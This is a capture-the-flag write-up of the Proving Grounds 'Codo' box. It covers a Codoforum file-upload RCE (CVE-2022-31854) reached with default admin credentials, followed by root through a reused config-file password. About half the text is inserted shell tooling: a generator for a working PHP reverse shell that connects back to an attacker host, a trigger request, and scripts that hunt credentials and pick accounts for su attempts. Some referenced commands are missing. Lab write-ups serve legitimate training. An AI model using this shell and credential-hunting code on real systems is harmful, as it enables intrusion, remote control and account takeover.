Codo
Source: Proving Grounds
OS: Linux
Community Rating: Easy
I started with the usual autorecon, which exposed:
SSH (22)
HTTP (80)
I began with HTTP (80). It displayed a Codoforum page. I played around for a while before checking for a CVE. I found CVE-2022-31854, an authenticated arbitrary file upload in the Codoforum admin panel that leads to RCE but requires valid admin credentials. I tried the default credentials (admin:admin) and they worked. I was in the admin panel!
I attempted to run the PoC to get a shell back, but that didn't work, so I did it manually.
I created a PHP reverse shell and then opened the admin panel at: http://192.168.197.23/admin/
Logged in as admin, navigated to Global Settings, and went to "Upload logo for your forum" where I uploaded my PHP shell.
To execute it, I visited: http://192.168.197.23/sites/default/assets/img/attachments/shell.php
These steps were outlined in the CVE's PoC. I just followed them.
I checked my listener and, sure enough, I got a reverse shell.
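The manual steps above (build a PHP reverse shell, upload it as the forum logo, request it from the attachments directory) as a small helper script. This is an added example, not the CVE PoC and not the author's own commands; the upload itself still happens by hand in the admin UI as described. The listener address and port are placeholders (assumption), the target IP and the attachments path are the ones from the write-up.

```shell
#!/bin/sh
# Added example: PHP reverse shell generator plus the trigger request for the
# Codoforum logo-upload RCE. Not from the original write-up; LHOST/LPORT are assumptions.

# Write a PHP reverse shell to $3 that connects back to $1:$2.
# proc_open wires the shell's stdin/stdout/stderr straight to the socket, so it does
# not depend on PHP's file-descriptor numbering the way "sh -i <&3 >&3" does.
make_php_shell() {
    cat > "$3" <<EOF
<?php
\$sock = fsockopen("$1", $2);
\$proc = proc_open("/bin/sh -i", array(0 => \$sock, 1 => \$sock, 2 => \$sock), \$pipes);
?>
EOF
}

# URL where Codoforum serves the uploaded logo: attachments directory + file name.
# $1 = target host, $2 = local path of the file that was uploaded
shell_url() {
    printf 'http://%s/sites/default/assets/img/attachments/%s\n' "$1" "$(basename "$2")"
}

# Request the uploaded file so the web server executes it. The HTTP request hangs
# for as long as the shell lives, hence the background job and the short timeout.
# $1 = target host, $2 = local path of the file that was uploaded
trigger_shell() {
    curl -s -m 5 -o /dev/null "$(shell_url "$1" "$2")" &
}

# Stand-alone usage: CODO_RUN=1 LHOST=<your ip> LPORT=4444 sh codo_shell.sh
if [ "${CODO_RUN:-0}" = 1 ]; then
    LHOST=${LHOST:-192.168.45.5}   # assumption: attacker VPN address
    LPORT=${LPORT:-4444}           # assumption: listener port
    TARGET=192.168.197.23          # target from the write-up
    make_php_shell "$LHOST" "$LPORT" shell.php
    echo "[*] shell.php written. Upload it via http://$TARGET/admin/ -> Global Settings -> 'Upload logo for your forum'"
    echo "[*] Start the listener:  nc -lvnp $LPORT"
    echo "[*] Then run:            trigger_shell $TARGET shell.php   (URL: $(shell_url "$TARGET" shell.php))"
fi
```

Once the logo upload has landed, `trigger_shell` is just the GET the write-up does in the browser; the script exists so the shell file and the URL it will be served from are built from the same name and cannot drift apart.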
I then converted it into a proper tty with the following commands:
I searched for a flag using
That found nothing. Then I remembered that the machine has only one flag. Time to escalate privileges and search again.
I uploaded linpeas, and it exposed a password in the PHP configuration file at: /var/www/html/sites/default/config.php
The password found was FatPanda123. I first tried it for the offsec user (since there was an offsec directory under /home), but it didn't work there. Then I tried it for root, and it worked. I was root, as simple as that.
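The two things linpeas did for the author here, credential hunting in the web root and deciding which local accounts a recovered password is worth trying against, done by hand. This is an added example, not from the write-up or from linpeas; the config.php content and passwd entries used for testing are constructed samples that mirror the box (the FatPanda123 value is the one the write-up reports).

```shell
#!/bin/sh
# Added example: manual credential hunting in a web root and selection of the local
# accounts to try a recovered password against. Not from the original write-up.

# Print file:line:match for values assigned to password-like keys under web root $1.
# Matches forms such as  'password' => 'x',  $db_pwd = "x",  define('DB_PASSWORD', 'x')
# and  DB_PASSWORD=x  in PHP, ini, .env, conf and yml files. Lines that merely mention
# the word (comments, 'min_password_length' => 8) are not matched because the key must
# be followed directly by an assignment separator.
find_config_creds() {
    grep -rniE \
        --include='*.php' --include='*.ini' --include='*.env' --include='*.conf' --include='*.yml' \
        "(passw(or)?d|secret|pwd)['\"]?[[:space:]]*(=>|=|:|,)[[:space:]]*['\"]?[^'\" ,;]+" \
        "$1" 2>/dev/null
}

# Print the users from passwd file $1 (default /etc/passwd) that have a real login
# shell. Service accounts with nologin/false/sync-style shells cannot be su'd into, so
# they are not worth a password attempt; on this box the result is root and offsec.
candidate_users() {
    awk -F: '$7 != "" && $7 !~ /(nologin|false|sync|halt|shutdown)$/ { print $1 }' "${1:-/etc/passwd}"
}

# Stand-alone usage from the foothold shell: CODO_WEBROOT=/var/www/html sh creds.sh
if [ -n "${CODO_WEBROOT:-}" ]; then
    echo "[*] credential-looking assignments under $CODO_WEBROOT:"
    find_config_creds "$CODO_WEBROOT" || echo "    (none)"
    echo "[*] accounts with a login shell (try each recovered password with: su <user>):"
    candidate_users /etc/passwd
fi
```

The grep is deliberately loose: a few false positives cost seconds to read, while a tighter pattern that misses `define('DB_PASSWORD', ...)` or an `.env` file costs the privilege escalation. Password reuse between the application database and a system account is exactly what worked here, so every candidate user, root included, gets a `su` attempt.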
A web application's administrative interface can be an effective RCE vector once valid credentials are obtained, so always try the default credentials first.
When a PoC doesn't work as-is, following its steps manually can still get you there.
Configuration files often contain sensitive credentials, and those credentials are frequently reused for system accounts, so test them against every local user, root included.